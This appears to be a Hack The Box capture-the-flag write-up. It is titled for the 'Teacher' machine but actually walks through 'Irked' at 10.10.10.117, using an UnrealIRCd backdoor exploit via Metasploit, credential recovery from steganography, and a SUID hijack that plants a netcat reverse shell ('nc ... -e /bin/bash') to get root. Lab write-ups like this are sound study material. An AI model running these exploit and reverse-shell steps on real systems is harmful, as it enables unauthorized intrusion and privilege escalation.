I"y6<p>HTB Teacher (10.10.10.153) MACHINE WRITE-UP</p>

<h2 id="part-1--initial-recon">PART 1 : Initial Recon</h2>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nmap --min-rate 1000 -p- -v 10.10.10.117
</span></code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8000/tcp  open  http-alt
8067/tcp  open  infi-async
46040/tcp open  unknown
65534/tcp open  unknown
</code></pre></div></div>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nmap -oN irked.nmap -p22,80,111,6697,8000,8067,46040,65534 -sC -sV -v 10.10.10.117
</span></code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open   http        Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open   rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35800/tcp  status
|_  100024  1          56850/udp  status
6697/tcp  open   ircs-u?
|_irc-info: Unable to open connection
8000/tcp  closed http-alt
8067/tcp  open   infi-async?
|_irc-info: Unable to open connection
46040/tcp closed unknown
65534/tcp open   unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>
<hr />

<h2 id="part-2--port-enumeration">PART 2 : Port Enumeration</h2>

<ol>
  <li>Open http://10.10.10.117 (default: <strong>port 80</strong>)
    <ul>
      <li>
        <p>Landing Page:</p>

        <p><img src="./screenshots/80_irked.png" alt="Landing Page" /></p>
      </li>
      <li>Page Source:
        <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">irked.jpg</span><span class="nt">&gt;</span>
<span class="nt">&lt;br&gt;</span>
<span class="nt">&lt;b&gt;&lt;center&gt;</span>IRC is almost working!<span class="nt">&lt;/b&gt;&lt;/center&gt;</span>
</code></pre></div>        </div>
        <p><strong>Notes</strong>:</p>
      </li>
      <li>The page seems to be pointing us to the <strong><em>IRC service</em></strong> on <strong>port 6697</strong></li>
      <li>The pages also only contains an image (<strong><em>irked.jpg</em></strong>)</li>
      <li>Running <code class="highlighter-rouge">gobuster</code> and <code class="highlighter-rouge">nikto</code> doesn’t seem to yield interesting results.</li>
    </ul>
  </li>
</ol>

<hr />

<h2 id="part-3--generate-user-shell">PART 3 : Generate User Shell</h2>
<ol>
  <li>Attempt exploitation of the IRC service (<strong>port 6697</strong>)
    <ul>
      <li>UnrealIRCD 3.2.8.1 Backdoor Command Execution (<a href="https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor">CVE-2010-2075</a>)
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">msfconsole
     
use exploit/unix/irc/unreal_ircd_3281_backdoor

show options
</span><span class="gp">#</span><span class="w"> </span>Name    Current Setting  Required  Description
<span class="gp">#</span><span class="w"> </span><span class="nt">----</span>    <span class="nt">---------------</span>  <span class="nt">--------</span>  <span class="nt">-----------</span>
<span class="gp">#</span><span class="w"> </span>RHOSTS                   <span class="nb">yes       </span>The target address range or CIDR identifier
<span class="gp">#</span><span class="w"> </span>RPORT   6667             <span class="nb">yes       </span>The target port <span class="o">(</span>TCP<span class="o">)</span>
<span class="go">
set RHOSTS 10.10.10.117
set RPORT 6697

run
</span><span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Started reverse TCP double handler on 10.10.15.122:4444 
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
<span class="gp">#</span><span class="w">     </span>:irked.htb NOTICE AUTH :<span class="k">***</span> Looking up your hostname...
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> 10.10.10.117:6697 - Sending backdoor command...
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Accepted the first client connection...
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Accepted the second client connection...
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Command: <span class="nb">echo </span>4JezGWGL0WskDMqt<span class="p">;</span>
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Writing to socket A
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Writing to socket B
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Reading from sockets...
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Reading from socket A
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> A: <span class="s2">"4JezGWGL0WskDMqt</span><span class="se">\r\n</span><span class="s2">"</span>
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Matching...
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> B is input...
<span class="gp">#</span><span class="w"> </span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Command shell session 1 opened <span class="o">(</span>10.10.15.122:4444 -&gt; 10.10.10.117:47923<span class="o">)</span>...
</code></pre></div>        </div>
      </li>
      <li>While inside shell:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">id
</span><span class="gp">#</span><span class="w"> </span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>ircd<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>ircd<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>ircd<span class="o">)</span>
<span class="go">     
</span><span class="gp">python -c 'import pty;</span><span class="w"> </span>pty.spawn<span class="o">(</span><span class="s2">"/bin/bash"</span><span class="o">)</span><span class="s1">'
</span><span class="go">
cat /etc/passwd | grep bash
</span><span class="gp">#</span><span class="w"> </span>root:x:0:0:root:/root:/bin/bash
<span class="gp">#</span><span class="w"> </span>djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
<span class="go">
cd /home/djmardov
cd Documents
ls -lah
</span><span class="gp">#</span><span class="w"> </span>drwxr-xr-x  2 djmardov djmardov 4.0K May 15  2018 <span class="nb">.</span>
<span class="gp">#</span><span class="w"> </span>drwxr-xr-x 18 djmardov djmardov 4.0K Nov  3 04:40 ..
<span class="gp">#</span><span class="w"> </span><span class="nt">-rw-r--r--</span>  1 djmardov djmardov   52 May 16  2018 .backup
<span class="gp">#</span><span class="w"> </span><span class="nt">-rw-------</span>  1 djmardov djmardov   33 May 15  2018 user.txt     
<span class="go">
cat .backup
</span><span class="gp">#</span><span class="w"> </span>Super elite steg backup pw
<span class="gp">#</span><span class="w"> </span>UPupDOWNdownLRlrBAbaSSss
</code></pre></div>        </div>
        <p><strong>Notes</strong>:</p>
      </li>
      <li>There exists a user named <strong>djmardov</strong></li>
      <li><strong><em>user.txt</em></strong> is readable only as <strong>djmardov</strong> or as <strong>root</strong></li>
      <li><strong><em>.backup</em></strong> contains a steg password
        <ul>
          <li>Maybe it could be used on <strong><em>irked.jpg</em></strong> from the http service</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Run <strong><em>irked.jpg</em></strong> on online steg tools
    <ul>
      <li>
        <p>https://futureboy.us/stegano/decinput.html</p>

        <p><img src="./screenshots/80_irked_steg.png" alt="Irked Steg" /></p>
      </li>
      <li>
        <p>Output:</p>
        <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Kab6h+m+bbp2J:HG
</code></pre></div>        </div>
      </li>
    </ul>
  </li>
  <li>Login via SSH as user <strong>djmardov</strong>
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">ssh -l djmardov 10.10.10.117
</span><span class="gp">#</span><span class="w"> </span>djmardov@10.10.10.117<span class="s1">'s password: Kab6h+m+bbp2J:HG
</span></code></pre></div>    </div>
    <p>While inside shell:</p>
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">cat ~/Documents/user.txt
</span><span class="gp">#</span><span class="w"> </span>4a66a78b12dc0e661a59d3f5c0267a8e
</code></pre></div>    </div>
  </li>
</ol>

<hr />

<h2 id="part-4--privilege-escalation-djmardov---root">PART 4 : Privilege Escalation (djmardov -&gt; root)</h2>
<ol>
  <li>Check for SUID files owned by root
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">find / -uid 0 -perm -4000 -type f 2&gt;</span>/dev/null
<span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>/usr/bin/viewuser
<span class="gp">#</span><span class="w"> </span>...
</code></pre></div>    </div>
  </li>
  <li>Try to run <strong><em>/usr/bin/viewuser</em></strong>
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-27 13:17 (:0)
djmardov pts/0        2019-04-27 13:18 (10.10.15.122)
sh: 1: /tmp/listusers: not found
</code></pre></div>    </div>
    <p><strong>Notes</strong>:</p>
    <ul>
      <li><strong><em>viewuser</em></strong> runs <strong><em>/tmp/listusers</em></strong>
        <ul>
          <li>The file does not yet exist in the system</li>
          <li><strong><em>/tmp/listusers</em></strong> will be run as root no matter who owns it</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Create payload:
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">echo "nc 10.10.15.122 4444 -e /bin/bash" &gt;</span><span class="w"> </span>/tmp/listusers
</code></pre></div>    </div>
  </li>
  <li>Establish <strong>root</strong> shell:
    <ol>
      <li>Local terminal:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nc -lvp 4444
</span></code></pre></div>        </div>
      </li>
      <li><strong>djmardov</strong> shell:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">/usr/bin/viewuser
</span></code></pre></div>        </div>
      </li>
      <li>netcat listener:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">id 
</span><span class="gp">#</span><span class="w"> </span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>djmardov<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>djmardov<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,25<span class="o">(</span>floppy<span class="o">)</span>,29<span class="o">(</span>audio<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,44<span class="o">(</span>video<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,108<span class="o">(</span>netdev<span class="o">)</span>,110<span class="o">(</span>lpadmin<span class="o">)</span>,113<span class="o">(</span>scanner<span class="o">)</span>,117<span class="o">(</span>bluetooth<span class="o">)</span>
<span class="go">      
find / -name root.txt
</span><span class="gp">#</span><span class="w"> </span>/root/root.txt
<span class="go">
cat /root/root.txt
</span><span class="gp">#</span><span class="w"> </span>8d8e9e8be64654b6dccc3bff4522daf3
</code></pre></div>        </div>
      </li>
    </ol>
  </li>
</ol>
:ET